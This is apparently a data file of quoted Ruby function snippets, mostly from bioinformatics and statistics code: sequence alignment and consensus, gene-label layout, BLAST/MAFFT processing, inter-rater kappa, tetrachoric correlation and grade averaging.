"def num_gene_rows\n\n # need width of 1.1 snps to display a gene\n original_gene_space = 1.1\n max_rows = 0\n\n # remove any genes that are outside the bounds of the\n @chromhash.each_value do |chrom|\n minpos = chrom.snp_list.get_min\n maxpos = chrom.snp_list.get_max\n\t\t\tif maxpos < minpos\n\t\t\t\tmaxpos = minpos\n\t\t\t\tminpos = chrom.snp_list.get_max\n\t\t\tend\n deletions = Array.new\n chrom.genes.each do |gene|\n\t\t\t\tif gene.end <= minpos or gene.start >= maxpos\n\t\t\t\t\tdeletions << gene\n\t\t\t\telse\n\t\t\t\t\tif gene.start < minpos\n\t\t\t\t\t\tgene.start = minpos\n\t\t\t\t\tend\n\t\t\t\t\tif gene.end > maxpos\n\t\t\t\t\t\tgene.end = maxpos\n\t\t\t\t\tend\n\t\t\t\tend\t\t\t\n end\n\n deletions.each do |d_gene|\n chrom.genes.delete(d_gene)\n end\n\t\tend\n\n # for each chromosome need to calculate how many rows needed\n # and return max across all chromosomes\n @chromhash.each_value do |chrom|\n minpos = chrom.snp_list.get_min\n maxpos = chrom.snp_list.get_max\n num_snps = chrom.snp_list.get_num_included_snps\n snp_size = (maxpos-minpos)/num_snps\n\n # need approximately space for 3 snps for each label\n # but need to make sure no overlap between adjacent\n\n # sweep through and take out as many as will fit in a row\n # then make second and additional passes for output\n num_genes = chrom.genes.length\n total_indexes = num_genes\n last_snp = 0\n\n # mark ones that are used here\n used_gene = Hash.new\n num_rows = 1\t\t\n while used_gene.length != num_genes\n total_indexes.times do |i|\n # when a gene is placed mark it as done\n\n if used_gene[i] == 1\n next\n end\n # locate ending point (in terms of snps for this gene)\n end_snp = (chrom.genes[i].end.to_f - minpos)/snp_size\n start_snp = (chrom.genes[i].start.to_f - minpos) /snp_size\t\t\t\t\n # line_start and line_end mark location of actual bar on plot\n chrom.genes[i].line_start = start_snp / num_snps\n chrom.genes[i].line_end = end_snp / num_snps\n snp_length = end_snp - start_snp\n chrom.genes[i].alignment = 'middle'\n chrom.genes[i].text_anchor = (end_snp-start_snp)/num_snps + chrom.genes[i].line_start\n gene_space = original_gene_space\n # increase gene space for long gene names\n\t\t\t\t\t# when gene isn't covering a long stretch of genome\n if chrom.genes[i].name.length >=7\n # gene_space += (chrom.genes[i].name.length-6) * 0.15\n gene_space = 2\n end\n\n\t\t\t\n # pad for label around actual location when needed\n if snp_length < gene_space\n start_snp = start_snp - gene_space/2 + snp_length/2\n end_snp = end_snp + gene_space/2 - snp_length/2\n end\n\n # shift start_snp and end_snp if this would be off edge\n if start_snp < 0\n end_snp = end_snp + start_snp.abs\n start_snp = 0\n chrom.genes[i].alignment = 'start'\n chrom.genes[i].text_anchor = start_snp / num_snps\n end\n\n if end_snp > num_snps\n start_snp = start_snp - (end_snp - num_snps)\n\t\t\t\t\t\tstart_snp = 0 if start_snp < 0\n end_snp = num_snps\n chrom.genes[i].alignment = 'end' unless start_snp==0\n chrom.genes[i].text_anchor = 1.0\n end\n\n chrom.genes[i].row = num_rows\n # overlap here so need to skip and check again in next row\n\t\t\t\t\tnext if start_snp < last_snp\n\n # this gene will fit in row\n used_gene[i] = 1\n # reset last_snp\n last_snp = end_snp\n\n end # end loop through genes\n num_rows = num_rows + 1\n last_snp = 0\n end # end while loop\n max_rows = num_rows if num_rows > max_rows\n end #end chromosome\n return max_rows-1\n\n end",
"def score_term word, year_hash, year\n # Must exceed this usage floor\n min_norm_count = 0.000001\n curr_nc = 0.0\n prev_nc = 0.0\n # Get total normalized usage counts over current period\n (year-GROUPSIZE+1).upto(year) do |y|\n begin\n curr_nc += year_hash[y][word][:nc] || 0.0\n rescue\n curr_nc += 0.0\n end\n end\n # Get total normalized usage counts over previous period\n (year-GROUPSIZE*2+1).upto(year-GROUPSIZE) do |y|\n begin\n prev_nc += year_hash[y][word][:nc] || 0.0\n rescue\n prev_nc += 0.0\n end\n end\n\n # Check to prevent divide y zero\n if prev_nc > 0.0\n growth = curr_nc / prev_nc\n else\n growth = 0.0\n end\n\n # Can balance growth with normalized usage; currently\n # only using growth.\n return growth #+ Math.log(nc*1000000)\nend",
"def test_kappa_ir_book\n \n @gold_standard = Retreval::GoldStandard.new\n \n for i in (1..300) do \n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => true\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => true\n end\n \n for i in (301..320) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => true\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => false\n end\n \n for i in (321..330) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => false\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => true\n end\n \n for i in (331..400) do\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Alice\", :relevant => false\n @gold_standard.add_judgement :document => \"doc#{i}\", :query => \"query#{i}\", :user => \"Bob\", :relevant => false\n end\n \n assert_equal(0.7759103641456584, @gold_standard.kappa, \"IR Book kappa test failed!\")\n end",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def score\n return @score if @score != -1\n prod =\n [p_bases_covered, 0.01].max.to_f * # proportion of bases covered\n [p_not_segmented, 0.01].max.to_f * # prob contig has 0 changepoints\n [p_good, 0.01].max.to_f * # proportion of reads that mapped good\n [p_seq_true, 0.01].max.to_f # scaled 1 - mean per-base edit distance\n @score = [prod, 0.01].max\n end",
"def creat_consensus_base_gap(base_array_input)\n base_array = Array.new(base_array_input)\n consensus_base = '-'\n number_of_bases = base_array.size\n hash_temp = Hash.new(0)\n base_array.each do |base|\n hash_temp[base] += 1\n end\n number_of_gap = hash_temp[\"-\"]\n gap_percentage = (number_of_gap.to_f/number_of_bases.to_f)\n base_array.delete(\"-\")\n h = Hash.new(0)\n if base_array.size >0\n base_array.each do |base|\n h[base] += 1\n end\n max_number = h.values.max\n max_list = []\n h.each do |k,v|\n if v == max_number\n max_list << k\n end\n end\n maxi_list_size = max_list.size\n if maxi_list_size == 1\n consensus_base = max_list.shift\n elsif maxi_list_size >= 3\n consensus_base = \"N\"\n elsif maxi_list_size == 2\n if max_list.include?(\"A\") and max_list.include?(\"T\")\n consensus_base = \"W\"\n elsif max_list.include?(\"A\") and max_list.include?(\"C\")\n consensus_base = \"M\"\n elsif max_list.include?(\"A\") and max_list.include?(\"G\")\n consensus_base = \"R\"\n elsif max_list.include?(\"T\") and max_list.include?(\"C\")\n consensus_base = \"Y\"\n elsif max_list.include?(\"G\") and max_list.include?(\"C\")\n consensus_base = \"S\"\n elsif max_list.include?(\"T\") and max_list.include?(\"G\")\n consensus_base = \"M\"\n end\n end\n end\n if gap_percentage >= 0.75\n consensus_base = \"-\"\n end\n return consensus_base\nend",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def calculate_intra_consensus_value\n count=0\n if IntraResidueContact.all(:seq_id => self.seq_id, :first_residue=>self.original_position) || IntraResidueContact.all(:seq_id => self.seq_id, :second_residue=>self.original_position)\n count +=1\n end\n #if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).color > 4\n if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).score < 0\n count +=1\n end\n if !Xdet.first(:aasequence_id => self.AAsequence_id).nil? && (Xdet.first(:aasequence_id => self.AAsequence_id).correlation > 0.0 || Xdet.first(:aasequence_id => self.AAsequence_id).correlation == -2)\n count +=1\n end\n if !NewCap.first(:seq_id=> self.seq_id, :position_one => self.original_position).nil? || !NewCap.first(:seq_id=> self.seq_id, :position_two => self.original_position).nil?\n count +=1\n end\n self.contact_consensus = count /4\n puts self.contact_consensus\n self.save\n end\n \n def calculate_intra_consensus_value_special\n count=0\n #if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).color > 4\n if !Conseq.first(:aasequence_id => self.AAsequence_id).nil? && Conseq.first(:aasequence_id => self.AAsequence_id).score < 0\n count +=1\n end\n if !Xdet.first(:aasequence_id => self.AAsequence_id).nil? && (Xdet.first(:aasequence_id => self.AAsequence_id).correlation > 0.0 || Xdet.first(:aasequence_id => self.AAsequence_id).correlation == -2)\n count +=1\n end\n if !NewCap.first(:seq_id=> self.seq_id, :position_one => self.original_position).nil? || !NewCap.first(:seq_id=> self.seq_id, :position_two => self.original_position).nil?\n count +=1\n end\n self.contact_consensus = count/3\n self.save\n puts self.contact_consensus\n end",
"def averages(grade_hash)\n grade_hash.transform_values{ |num| num.reduce(:+) / num.length }\nend",
"def calcSignificance(inMatrix,totalGenes,bgRate)\n\n #total number of mutations in matrix\n oneCount = inMatrix.rowSums.sum\n \n #calculate the adjustment from the raw matrix, for simplicity (prob should be switched later)\n penalty = calcAdjustment(inMatrix,totalGenes)\n\n #sort the matrix (have already paid the penalty for this)\n inMatrix.sortByRowSums!\n inMatrix.sortByColSums!\n\n @probNullVal = bgRate\n @negProbNullVal = 1-@probNullVal\n \n #calculate d for the matrix\n d = sigCalc(inMatrix) \n\n return d - penalty \nend",
"def find_best_ratio(samples, n, step_sz)\n spam = samples.select { |s| s.kind == :spam }.shuffle\n ham = samples.select { |s| s.kind == :ham }.shuffle\n\n # bests = {\n # :accuracy => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # :precision => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # :recall => {:step => 0, :value => 0.0, :ratio => nil, :mat => nil},\n # }\n\n steps = {}\n\n (step_sz).step(0.99, step_sz).each do |i|\n ratio = {:spam => (n * i).round, :ham => (n * (1 - i)).round}\n limited_samples = spam.take(ratio[:spam]) + ham.take(ratio[:ham])\n\n STDERR.puts \"Step %0.2f, #{ratio.inspect}, n=#{ratio.values.reduce(:+)}\" % i\n\n mat = CrossValidate.run(limited_samples, Classifier.fetch(0, :unigram))\n\n steps[i] = {:ratio => ratio, :mat => mat}\n # if mat[:accuracy] > bests[:accuracy][:value]\n # bests[:accuracy] = {:step => i, :value => mat[:accuracy], :ratio => ratio, :mat => mat}\n # end\n\n # if mat[:precision] > bests[:precision][:value]\n # bests[:precision] = {:step => i, :value => mat[:precision], :ratio => ratio, :mat => mat}\n # end\n\n # if mat[:recall] > bests[:recall][:value]\n # bests[:recall] = {:step => i, :value => mat[:recall], :ratio => ratio, :mat => mat}\n # end\n end\n\n steps\n # bests\nend",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def identify_clusters\n raise ArgumentError, 'Missing BLAT alignment file.' unless @alignment_file\n \n # Pull out all of the hits clustered by the query into an array\n puts \"Reading alignment file...\" if @verbose\n query_hits = []\n IO::BLASTFormat.open(@alignment_file) do |f|\n f.each_query do |query, hits| \n query_hits << hits.select { |hit| hit.e_value <= @e_value }\n end\n end\n \n # Create a status bar to monitor thread process\n pbar = ProgressBar.new(\"Converting Hits\", query_hits.size, STDOUT) if @verbose\n \n # Thread the creation of the entries from the hits\n entries = Utilities::Threader.thread(query_hits, threads: @threads) do |thread_query_hits|\n thread_query_hits.map do |hits|\n pbar.inc if @verbose\n \n # Cluster the hits\n clusters = Alignment::Aligner.cluster_hits(hits, cluster_on: :subject)\n \n # Convert the clusters to entries\n clusters.map { |clustered_hits| create_feature(clustered_hits) }\n end\n end.flatten\n\n # Write the file\n puts \"Writing entries to file...\" if @verbose\n @output_file ||= \"#{@alignment_file}.gff3\"\n IO::GFFFormat.open(@output_file, mode: 'w') do |f|\n f.puts_header\n f.puts(entries, progress_bar: true, id_prefix: @id_prefix)\n end\n \n @output_file\n end",
"def final_letter_grades(grade_hash)\n letter_grade averages grade_hash\nend",
"def final_letter_grades(grade_hash)\n averages = grade_hash.inject({}) { |h, (k,v)| h[k] = letter_grade(v.reduce{|x,n| x += n}/v.length) ; h}\nend",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def compute_ruby\n check_frequencies\n #\n # INITIALIZATION\n #\n @r = 0\n sdzero = 0\n @sdr = 0\n @itype = 0\n @ifault = 0\n delta = 0\n \n\n # GOTO (4, 1, 2 , 92), kdelta\n #\n # delta IS 0.0, 0.5 OR -0.5 ACCORDING TO WHICH CELL IS 0.0\n #\n\n if(@kdelta==2)\n # 1\n delta=0.5\n @r=-1 if (@a==0 and @d==0)\n elsif(@kdelta==3)\n # 2\n delta=-0.5\n @r=1 if (@b==0 and @c==0)\n end\n # 4\n if @r!=0\n @itype=3\n end\n\n #\n # STORE FREQUENCIES IN AA, BB, CC AND DD\n #\n @aa = @a + delta\n @bb = @b - delta\n @cc = @c - delta\n @dd = @d + delta\n @tot = @aa+@bb+@cc+@dd\n #\n # CHECK IF CORRELATION IS NEGATIVE, 0.0, POSITIVE\n # IF (AA * DD - BB * CC) 7, 5, 6\n\n corr_dir=@aa * @dd - @bb * @cc\n if(corr_dir < 0)\n # 7\n @probaa = @bb.quo(@tot)\n @probac = (@bb + @dd).quo(@tot)\n @ksign = 2\n # -> 8\n else\n if (corr_dir==0)\n # 5\n @itype=4\n end\n # 6\n #\n # COMPUTE PROBABILITIES OF QUADRANT AND OF MARGINALS\n # PROBAA AND PROBAC CHOSEN SO THAT CORRELATION IS POSITIVE.\n # KSIGN INDICATES WHETHER QUADRANTS HAVE BEEN SWITCHED\n #\n\n @probaa = @aa.quo(@tot)\n @probac = (@aa+@cc).quo(@tot)\n @ksign=1\n end\n # 8\n\n @probab = (@aa+@bb).quo(@tot)\n\n #\n # COMPUTE NORMAL DEVIATES FOR THE MARGINAL FREQUENCIES\n # SINCE NO MARGINAL CAN BE 0.0, IE IS NOT CHECKED\n #\n @zac = Distribution::Normal.p_value(@probac.to_f)\n @zab = Distribution::Normal.p_value(@probab.to_f)\n @ss = Math::exp(-0.5 * (@zac ** 2 + @zab ** 2)).quo(TWOPI)\n #\n # WHEN R IS 0.0, 1.0 OR -1.0, TRANSFER TO COMPUTE SDZERO\n #\n if (@r != 0 or @itype > 0)\n compute_sdzero\n return true\n end\n #\n # WHEN MARGINALS ARE EQUAL, COSINE EVALUATION IS USED\n #\n if (@a == @b and @b == @c)\n calculate_cosine\n return true\n end\n #\n # INITIAL ESTIMATE OF CORRELATION IS YULES Y\n #\n @rr = ((Math::sqrt(@aa * @dd) - Math::sqrt(@bb * @cc)) ** 2) / (@aa * @dd - @bb * @cc).abs\n @iter = 0\n begin\n #\n # IF RR EXCEEDS RCUT, GAUSSIAN QUADRATURE IS USED\n #\n #10\n if @rr>RCUT\n gaussian_quadrature\n return true\n end\n #\n # TETRACHORIC SERIES IS COMPUTED\n #\n # INITIALIZATION\n #\n va=1.0\n vb=@zac.to_f\n wa=1.0\n wb=@zab.to_f\n term = 1.0\n iterm = 0.0\n @sum = @probab * @probac\n deriv = 0.0\n sr = @ss\n #15\n begin\n if(sr.abs<=CONST)\n #\n # RESCALE TERMS TO AVOID OVERFLOWS AND UNDERFLOWS\n #\n sr = sr / CONST\n va = va * CHALF\n vb = vb * CHALF\n wa = wa * CHALF\n wb = wb * CHALF\n end\n #\n # FORM SUM AND DERIVATIVE OF SERIES\n #\n # 20\n dr = sr * va * wa\n sr = sr * @rr / term\n cof = sr * va * wa\n #\n # ITERM COUNTS NO. OF CONSECUTIVE TERMS < CONV\n #\n iterm+= 1\n iterm=0 if (cof.abs > CONV)\n @sum = @sum + cof\n deriv += dr\n vaa = va\n waa = wa\n va = vb\n wa = wb\n vb = @zac * va - term * vaa\n wb = @zab * wa - term * waa\n term += 1\n end while (iterm < 2 or term < 6)\n #\n # CHECK IF ITERATION CONVERGED\n #\n if((@sum-@probaa).abs <= CITER)\n @itype=term\n calculate_sdr\n return true\n end\n #\n # CALCULATE NEXT ESTIMATE OF CORRELATION\n #\n #25\n @iter += 1\n #\n # IF TOO MANY ITERATlONS, RUN IS TERMINATED\n #\n delta = (@sum - @probaa) / deriv\n @rrprev = @rr\n @rr = @rr - delta\n @rr += 0.5 * delta if(@iter == 1)\n @rr= RLIMIT if (@rr > RLIMIT)\n @rr =0 if (@rr < 0.0)\n end while @iter < NITER\n raise \"Too many iteration\"\n # GOTO 10\n end",
"def fit ind; ind.chromosome.inject(0,:+); end",
"def sortmerna(input_dir, samples_h)\n\n samples, labels = [], []\n rrna_5s_a, rrna_5_8s_a, rrna_18s_a, rrna_28s_a, rrna_all = [], [], [], [], []\n\n if File.exist?(\"#{input_dir}/#{samples_h.keys[0]}_aligned.log\")\n puts \"\\t\\tRun SortMeRna Statistics...\"\n\n samples_h.each do |sample, label|\n samples.push(sample)\n labels.push(label)\n read = false\n all = 0\n File.open(\"#{input_dir}/#{sample}_aligned.log\",'r').each do |line|\n read = true if line.include?('By database:')\n if read\n if line.include?('rfam-5s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5s_a.push(value)\n all += value\n end\n if line.include?('rfam-5.8s-database-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_5_8s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-18s-id95.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_18s_a.push(value)\n all += value\n end\n if line.include?('silva-euk-28s-id98.fasta')\n value = line.split(\"\\t\")[2].chomp.sub('%','').to_f\n rrna_28s_a.push(value)\n all += value\n end\n end\n end\n rrna_all.push(all.round(2))\n end\n df = Nyaplot::DataFrame.new({:sample => samples, :label => labels, :rrna_5s => rrna_5s_a, :rrna_5_8s => rrna_5_8s_a, :rrna_18s => rrna_18s_a, :rrna_28s => rrna_28s_a, :all_rrna => rrna_all })\n df = Nyaplot::DataFrame.new({:label => %w(5s 5.8s 18s 28s all), :rrna => rrna_5s_a+rrna_5_8s_a+rrna_18s_a+rrna_28s_a+rrna_all })\n\n colors = Nyaplot::Colors.qual\n frame = Nyaplot::Frame.new\n\n #[:all_rrna, :rrna_5s, :rrna_5_8s, :rrna_18s, :rrna_28s].each do |rrna|\n plot = Nyaplot::Plot.new\n plot.configure do\n x_label('rRNA type')\n y_label(\"% rRNA\")\n yrange([0,100])\n legend(true)\n end\n #bar = plot.add_with_df(df, :bar, :label, rrna) # x-> column :label, y-> column :rrna\n bar = plot.add_with_df(df, :bar, :label, :rrna)\n bar.color(colors)\n frame.add(plot)\n\n frame.export_html(\"#{$out_dir}/sortmerna.html\")\n frame_html = File.open(\"#{$out_dir}/sortmerna.html\",'a')\n frame_html << \"\\n\\n<p>\\n#{df_to_html_table(df.to_html)}\\n</p>\\n\\n\"\n frame_html.close\n end\n end",
"def expected_score(r_A, r_B)\n 1 / (1 + 10**((r_B - r_A) / 400.0))\n end",
"def exec_seq(seq,blast_query)\n\n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: searching sequence repeated at input file\" \n\n fasta_input=@params.get_param('truncated_input_file')\n \n blast = BatchBlast.new(\"-db #{fasta_input}\" ,'blastn',\" -task blastn-short -searchsp #{SIZE_SEARCH_IN_IGNORE} -evalue #{@params.get_param('blast_evalue_ignore_repeated')} -perc_identity #{@params.get_param('blast_percent_ignore_repeated')}\") #get contaminants\n \n p_start = @params.get_param('piro_repeated_start').to_i\n p_length = @params.get_param('piro_repeated_length').to_i\n \n \n blast_table_results = blast.do_blast(seq.seq_fasta[p_start,p_length]) #rise seq to contaminants executing over blast\n \n #blast_table_results = BlastTableResult.new(res)\n \n \n type = \"ActionIgnoreRepeated\" \n \n # @stats[:rejected_seqs]={} \n \n actions=[] \n blast_table_results.querys.each do |query|\n \n # puts \"BLAST IGUALES:\"\n # puts res.join(\"\\n\") \n if query.size>1 \n names = query.hits.collect{ |h| \n if h.align_len > (p_length-2)\n h.subject_id\n end\n }\n \n names.compact! \n \n # puts \"IGUALES:\" + names.size.to_s \n # puts names.join(',') \n \n if !names.empty?\n names.sort!\n\t\t\t\t \n if (names[0] != seq.seq_name) # Add action when the sequence is repeated \n\t\t\t\t # if true \n\t\t\t\t a = seq.new_action(0,0,type)\n\t\t\t\t a.message = seq.seq_name + ' equal to ' + names[0] \n\t\t\t\t actions.push a\n\t\t\t\t seq.seq_rejected=true \n\t\t\t\t seq.seq_rejected_by_message='repeated'\n\t\t\t\t seq.seq_repeated=true \n\t\t\t\t \n # @stats[:rejected_seqs]={'rejected_seqs_by_repe' => 1} \n add_stats('rejected_seqs','rejected_seqs_by_repe') \n # puts \"#{names[0]} != #{seq.seq_name} >>>>>>\" \n\t\t\t\t end \n end\n \n end \n \n end \n \n seq.add_actions(actions)\n \n end",
"def process\n\n # process for all arities\n @combo_counts = Hash.new(0) #count of all pairings\n @cite_counts = Hash.new(0) #count of times each section is cited\n @total_population = 0\n @occurrence_counts = Array.new\n arity = 1\n while arity > 0\n arity = arity + 1\n @occurrence_counts[arity] = 0\n f = File.open(@fn, \"r\")\n f.each_line do |line|\n # clean up cruft\n # split and go\n # sorting is done to ensure that combination pairings are in same order throughout. This may not work.\n next if line =~ /^Section/\n line.chomp!.gsub!(/\"/, '')\n breakout = line.split(',')\n # turns out that sometimes there are duplicated entries\n breakout.sort!.uniq!\n @total_population = @total_population + 1\n breakout.each { |cite| @cite_counts[cite] = @cite_counts[cite] + 1 }\n combos = breakout.combination(arity).to_a\n if combos.length > 0\n @occurrence_counts[arity] = @occurrence_counts[arity] + 1\n combos.each do |combo|\n @combo_counts[combo] = @combo_counts[combo] + 1\n end\n end\n end\n f.close\n\n if @combo_counts.length < 1\n puts \"There are #{@total_population} violation events in the database.\"\n for n in 2..arity do\n pct = 100 * @occurrence_counts[n] / @total_population\n puts \"There are #{@occurrence_counts[n]} violation events that contain #{n}-way violations ( #{pct}% ) .\"\n end\n exit\n end\n # sort the hash by count\n @combo_counts = Hash[@combo_counts.sort_by { |key, value| value }.reverse]\n make_csv(arity)\n @combo_counts.clear\n @cite_counts.clear\n @combo_counts.default = 0\n @cite_counts.default = 0\n @total_population = 0\n end\n\n end",
"def update_alignment\n\n inital_params = {is_valid:0, step: step, km: km, kcal: kcal}\n new_align = segments.create_with(inital_params).find_or_create_by(is_valid: 0)\n\n total_valid = segments.select(\"sum(step) as step, sum(km) as km, sum(kcal) as kcal\").where(\"is_valid = 1\").first\n\n unless total_valid.step.nil?\n new_align.step = step - total_valid.step\n new_align.km = km - total_valid.km\n new_align.kcal = kcal - total_valid.kcal\n end\n\n new_align.save!(:validate => false)\n end",
